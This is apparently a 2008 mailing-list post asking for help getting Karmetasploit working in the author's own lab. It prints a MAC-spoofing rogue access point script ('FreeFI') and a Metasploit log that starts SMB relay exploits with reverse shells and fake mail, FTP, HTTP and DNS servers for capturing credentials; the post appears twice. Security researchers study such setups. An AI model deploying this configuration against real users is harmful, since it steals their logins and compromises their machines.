BackTrack 3 - Karmetasploit with Alfa AWUS036H
161 views
Skip to first unread message
ax0n
Sep 7, 2008, 11:56:54 PM9/7/08
to HiR Information Report
I've been trying to get Karmetasploit working in the HiR lab-of-doom
with the Alfa AWUS036H. This is a very powerful USB WiFi adapter.
Here's a log of where I'm at:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-
Login and fetch my alfa.sh script, a derivative of the atheros-
specific evilap.sh script in BT3:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-
Last login: Mon Sep 8 02:53:36 2008
Linux 2.6.21.5.
bt ~ # cd /pentest/wireless/karma-msf-scripts-0.01/
bt karma-msf-scripts-0.01 # wget stuff.h-i-r.net/blogstuff/alfa.sh
--03:31:17-- http://stuff.h-i-r.net/blogstuff/alfa.sh
=> `alfa.sh'
Resolving stuff.h-i-r.net... 70.85.58.244
Connecting to stuff.h-i-r.net|70.85.58.244|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 743 [application/x-sh]
100%[====================================>] 743 --.--K/
s
03:31:17 (20.12 MB/s) - `alfa.sh' saved [743/743]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-
Contents of my script:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-
bt karma-msf-scripts-0.01 # cat alfa.sh
#!/bin/sh
# Based on evilap.sh distributed with BackTrack 3 - Modified for Alfa
WiFi
# Bring up the interface
echo "ifconfig up"
ifconfig wlan0 up
echo "Spoofing MAC"
macchanger -A wlan0
echo "Airmon-ng starting"
airmon-ng start wlan0
echo "Setting up the AP"
iwconfig wlan0 mode Master essid FreeFI channel 6
ifconfig wlan0 10.0.0.1 netmask 255.255.255.0
# Reset/restart (just in case) dhcp server/tcpdump
killall -9 dhcpd tcpdump
echo > /var/state/dhcp/dhcpd.leases
dhcpd -cf /etc/dhcpd.conf wlan0
tcpdump -ni wlan0 -s 0 -w /pentest/wireless/karma-msf-scripts-0.01/
evilap_eth.cap >/dev/null 2>&1 &
# Start up metasploit
/msf3/msfconsole -r /msf3/karma.rc
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-
Running it. All seems well...
rausb0 is the interface I'm using to connect with my main home
network.
wlan0 is the Alfa AWUS036H
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-
bt karma-msf-scripts-0.01 # ./alfa.sh
ifconfig up
Spoofing MAC
Current MAC: 00:c0:ca:1b:f4:0a (Alfa, Inc.)
Faked MAC: 00:04:ea:db:fe:a5 (Hewlett-packard Company)
Airmon-ng starting
Interface Chipset Driver
wlan0 RTL8187 r8187 (monitor mode enabled)
rausb0 Ralink USB rt73
Setting up the AP
dhcpd: no process killed
tcpdump: no process killed
Internet Systems Consortium DHCP Server V3.0.6
Copyright 2004-2007 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 0 leases to leases file.
Listening on LPF/wlan0/00:04:ea:db:fe:a5/10.0.0/24
Sending on LPF/wlan0/00:04:ea:db:fe:a5/10.0.0/24
Sending on Socket/fallback/fallback-net
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ msf v3.2-release
+ -- --=[ 294 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 58 aux
resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use exploit/windows/smb/smb_relay
resource> set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
resource> set LHOST 10.0.0.1
LHOST => 10.0.0.1
resource> set SRVPORT 139
SRVPORT => 139
resource> set LPORT 1390
LPORT => 1390
resource> exploit
[*] Started reverse handler
[*] Server started.
resource> use exploit/windows/smb/smb_relay
resource> set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
resource> set LHOST 10.0.0.1
LHOST => 10.0.0.1
resource> set SRVPORT 445
SRVPORT => 445
resource> set LPORT 4450
LPORT => 4450
resource> exploit
[*] Started reverse handler
[*] Server started.
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 110
SRVPORT => 110
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 995
SRVPORT => 995
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/ftp
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL false
SSL => false
resource> set SRVPORT 143
SRVPORT => 143
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL true
SSL => true
resource> set SRVPORT 993
SRVPORT => 993
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL false
SSL => false
resource> set SRVPORT 25
SRVPORT => 25
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL true
SSL => true
resource> set SRVPORT 465
SRVPORT => 465
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/fakedns
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 80
SRVPORT => 80
resource> set BGIMAGE /msf3/load.gif
BGIMAGE => /msf3/load.gif
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8080
SRVPORT => 8080
resource> set BGIMAGE /msf3/load.gif
BGIMAGE => /msf3/load.gif
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 443
SRVPORT => 443
resource> set BGIMAGE /msf3/load.gif
BGIMAGE => /msf3/load.gif
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8443
SRVPORT => 8443
resource> set BGIMAGE /msf3/load.gif
BGIMAGE => /msf3/load.gif
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
msf auxiliary(http) >
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-
From there, I get "FreeFI" showing up on my Mac under "Devices" - This
is usually where you find ad-hoc networks and the like. When I try to
join it, nothing happens. tcpdump doesn't see anything, either.
Nothing is logged to the logfile.
It feels like I'm close, but I'm at a loss. Ideas?
with the Alfa AWUS036H. This is a very powerful USB WiFi adapter.
Here's a log of where I'm at:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-
Login and fetch my alfa.sh script, a derivative of the atheros-
specific evilap.sh script in BT3:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-
Last login: Mon Sep 8 02:53:36 2008
Linux 2.6.21.5.
bt ~ # cd /pentest/wireless/karma-msf-scripts-0.01/
bt karma-msf-scripts-0.01 # wget stuff.h-i-r.net/blogstuff/alfa.sh
--03:31:17-- http://stuff.h-i-r.net/blogstuff/alfa.sh
=> `alfa.sh'
Resolving stuff.h-i-r.net... 70.85.58.244
Connecting to stuff.h-i-r.net|70.85.58.244|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 743 [application/x-sh]
100%[====================================>] 743 --.--K/
s
03:31:17 (20.12 MB/s) - `alfa.sh' saved [743/743]
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-
Contents of my script:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-
bt karma-msf-scripts-0.01 # cat alfa.sh
#!/bin/sh
# Based on evilap.sh distributed with BackTrack 3 - Modified for Alfa
WiFi
# Bring up the interface
echo "ifconfig up"
ifconfig wlan0 up
echo "Spoofing MAC"
macchanger -A wlan0
echo "Airmon-ng starting"
airmon-ng start wlan0
echo "Setting up the AP"
iwconfig wlan0 mode Master essid FreeFI channel 6
ifconfig wlan0 10.0.0.1 netmask 255.255.255.0
# Reset/restart (just in case) dhcp server/tcpdump
killall -9 dhcpd tcpdump
echo > /var/state/dhcp/dhcpd.leases
dhcpd -cf /etc/dhcpd.conf wlan0
tcpdump -ni wlan0 -s 0 -w /pentest/wireless/karma-msf-scripts-0.01/
evilap_eth.cap >/dev/null 2>&1 &
# Start up metasploit
/msf3/msfconsole -r /msf3/karma.rc
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-
Running it. All seems well...
rausb0 is the interface I'm using to connect with my main home
network.
wlan0 is the Alfa AWUS036H
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-
bt karma-msf-scripts-0.01 # ./alfa.sh
ifconfig up
Spoofing MAC
Current MAC: 00:c0:ca:1b:f4:0a (Alfa, Inc.)
Faked MAC: 00:04:ea:db:fe:a5 (Hewlett-packard Company)
Airmon-ng starting
Interface Chipset Driver
wlan0 RTL8187 r8187 (monitor mode enabled)
rausb0 Ralink USB rt73
Setting up the AP
dhcpd: no process killed
tcpdump: no process killed
Internet Systems Consortium DHCP Server V3.0.6
Copyright 2004-2007 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 0 leases to leases file.
Listening on LPF/wlan0/00:04:ea:db:fe:a5/10.0.0/24
Sending on LPF/wlan0/00:04:ea:db:fe:a5/10.0.0/24
Sending on Socket/fallback/fallback-net
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ msf v3.2-release
+ -- --=[ 294 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 58 aux
resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use exploit/windows/smb/smb_relay
resource> set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
resource> set LHOST 10.0.0.1
LHOST => 10.0.0.1
resource> set SRVPORT 139
SRVPORT => 139
resource> set LPORT 1390
LPORT => 1390
resource> exploit
[*] Started reverse handler
[*] Server started.
resource> use exploit/windows/smb/smb_relay
resource> set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
resource> set LHOST 10.0.0.1
LHOST => 10.0.0.1
resource> set SRVPORT 445
SRVPORT => 445
resource> set LPORT 4450
LPORT => 4450
resource> exploit
[*] Started reverse handler
[*] Server started.
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 110
SRVPORT => 110
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 995
SRVPORT => 995
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/ftp
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL false
SSL => false
resource> set SRVPORT 143
SRVPORT => 143
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/imap
resource> set SSL true
SSL => true
resource> set SRVPORT 993
SRVPORT => 993
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL false
SSL => false
resource> set SRVPORT 25
SRVPORT => 25
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/smtp
resource> set SSL true
SSL => true
resource> set SRVPORT 465
SRVPORT => 465
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/fakedns
resource> run
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 80
SRVPORT => 80
resource> set BGIMAGE /msf3/load.gif
BGIMAGE => /msf3/load.gif
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8080
SRVPORT => 8080
resource> set BGIMAGE /msf3/load.gif
BGIMAGE => /msf3/load.gif
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 443
SRVPORT => 443
resource> set BGIMAGE /msf3/load.gif
BGIMAGE => /msf3/load.gif
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/http
resource> set SRVPORT 8443
SRVPORT => 8443
resource> set BGIMAGE /msf3/load.gif
BGIMAGE => /msf3/load.gif
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
msf auxiliary(http) >
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-
From there, I get "FreeFI" showing up on my Mac under "Devices" - This
is usually where you find ad-hoc networks and the like. When I try to
join it, nothing happens. tcpdump doesn't see anything, either.
Nothing is logged to the logfile.
It feels like I'm close, but I'm at a loss. Ideas?
Reply all
Reply to author
Forward
0 new messages